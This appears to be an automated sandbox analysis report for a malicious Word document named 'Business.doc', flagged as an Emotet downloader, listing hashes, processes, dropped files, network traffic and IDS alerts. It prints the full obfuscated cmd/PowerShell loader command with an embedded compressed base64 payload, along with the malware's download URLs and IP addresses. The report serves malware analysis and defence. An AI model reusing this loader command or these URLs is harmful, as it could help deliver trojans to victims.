analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

Business

Full analysis: https://app.any.run/tasks/113f486b-4ce6-4db2-b219-365dac8a7beb
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: November 08, 2018, 08:53:00
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
trojan
maldoc-4
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Sadie-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Nov 8 07:55:00 2018, Last Saved Time/Date: Thu Nov 8 07:55:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5:

A34F783355CFB0A83EC4A330F1BEA2A5

SHA1:

7E68508780BC83E9FFAD22F7026DC5C0FA62D7AF

SHA256:

8D573D296B7A5CFEE0E83F6A9E8C9161E3E1126B608EEBC092310CE3375FDF35

SSDEEP:

768:I/rVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o9OH5zeIVMOwu:I/rocn1kp59gxBK85fBt+a9O3

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3708)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3708)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 1800)
    • Executes PowerShell scripts

      • CMD.exe (PID: 2736)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3708)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3708)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 14
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 13
Words: 2
Pages: 1
ModifyDate: 2018:11:08 07:55:00
CreateDate: 2018:11:08 07:55:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Sadie-PC
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
35
Monitored processes
3
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3708"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Business.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2736CMD CmD /c "SEt CwymA= ^& ((VAriable '*mdr*').nAmE[3,11,2]-JOIn'')(nEw-oBJECt systEM.Io.STreAMReaDer(( nEw-oBJECt iO.comPReSsIoN.deFLaTeSTreaM([sYsTEm.IO.MeMORysTream] [sySTEM.cONVerT]::frombaSe64STrIng('NZBdS8MwGIX/Si8C2ahNLucWClOHrgpCHTgm3qTtq61rPhbeNm6l/9212NvzHB44h5hNGWvwkcl+IMfgFZDtIXuoK9AoSPKkY1oi2hXn2Eoniwuw3Ch+u/5PpcPLUZ5tKZ2S+XmATDZ8d5oKReONZhqQe2sjaS1/mZCqVCZdoxo1Oj9Sl74d0sWEvfcsK5AZ980yx+/RvD9TtrN1hTO6pnNB7k5FEAd0uVxQQba+iQnodoWgbEg/aTjwkDL4BSq+jAOZlzNy2G+DSgfDtHmH7tyR6wVsY7yujSweqxrGzk0wCOci0a05QpRcpWMisqvnKPpcYl52ff8H' ),[SYStEM.io.coMPReSsiON.comPReSSiONmOdE]::dEcoMPREsS ) ), [SYsTEM.TEXT.EnCoDINg]::Ascii)).rEadtoEnD()&& pOWerSHELl ${e`X`ecu`T`ionCon`TexT}.\"I`NVo`KEcoM`MANd\".( \"{2}{1}{3}{0}\" -f 't','KE','inVo','ScRiP' ).Invoke( ( ^& (\"{1}{0}{2}\"-f'-','Get','ItEM') (\"{2}{0}{1}\"-f 'n','V:cwYma','e')).\"vA`lue\" )" C:\Windows\system32\CMD.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1800pOWerSHELl ${e`X`ecu`T`ionCon`TexT}.\"I`NVo`KEcoM`MANd\".( \"{2}{1}{3}{0}\" -f 't','KE','inVo','ScRiP' ).Invoke( ( & (\"{1}{0}{2}\"-f'-','Get','ItEM') (\"{2}{0}{1}\"-f 'n','V:cwYma','e')).\"vA`lue\" )C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CMD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 192
Read events
791
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
2
Unknown types
4

Dropped files

PID
Process
Filename
Type
3708WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR314C.tmp.cvr
MD5:
SHA256:
1800powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IIHKAS16HWA2N5NYBNZ3.temp
MD5:
SHA256:
3708WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:DAD99A7EF179A2263992AB87E0A2D517
SHA256:A618F395034F15ABE9396B8F394939BCEF11AE43F21369868966FCBE2C328FC0
1800powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:2E6C332796340AFFBFF5230455889D0D
SHA256:6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E
1800powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF183ad1.TMPbinary
MD5:2E6C332796340AFFBFF5230455889D0D
SHA256:6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E
3708WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:EBCAF04E52E2FB43958323D955EE1426
SHA256:AB7869DF04AFBDFA481E3B2F5DEB3F991D82706931618007547C4DC59A7C3482
3708WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Business.doc.LNKlnk
MD5:AF06FF039917D9D49022E24487028C90
SHA256:EAC2EF26C3644F4D4DF2D0D4948EE0198B94CAD3630EE5DDC368CBC522E0A413
3708WINWORD.EXEC:\Users\admin\Desktop\~$siness.docpgc
MD5:7C1B11A8FB203104CB7B072BB8CDF4E7
SHA256:D345243ADFB343B2408B6FAFC101F487FC1B605AD5881383BC66FCFB926F5E27
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
5
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1800
powershell.exe
GET
404
159.69.58.176:80
http://www.bdt.org.br/BtoVJ
US
xml
345 b
malicious
1800
powershell.exe
GET
404
143.95.76.237:80
http://artzkaypharmacy.com.au/Sq
US
xml
345 b
malicious
1800
powershell.exe
GET
404
143.95.236.37:80
http://tvaradze.com/8
US
xml
345 b
malicious
1800
powershell.exe
GET
404
112.223.193.156:80
http://duwon.net/wpp-app/K
KR
xml
345 b
suspicious
1800
powershell.exe
GET
404
103.31.250.98:80
http://mimbarumum.com/ZQrQRYQ7
ID
xml
345 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1800
powershell.exe
143.95.76.237:80
artzkaypharmacy.com.au
Colo4, LLC
US
malicious
1800
powershell.exe
159.69.58.176:80
www.bdt.org.br
US
suspicious
1800
powershell.exe
103.31.250.98:80
mimbarumum.com
Argon Data Communication
ID
malicious
1800
powershell.exe
143.95.236.37:80
tvaradze.com
Colo4, LLC
US
suspicious
1800
powershell.exe
112.223.193.156:80
duwon.net
LG DACOM Corporation
KR
suspicious

DNS requests

Domain
IP
Reputation
tvaradze.com
  • 143.95.236.37
malicious
artzkaypharmacy.com.au
  • 143.95.76.237
malicious
duwon.net
  • 112.223.193.156
suspicious
mimbarumum.com
  • 103.31.250.98
malicious
www.bdt.org.br
  • 159.69.58.176
malicious

Threats

PID
Process
Class
Message
1800
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
1800
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
1800
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
1800
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
No debug info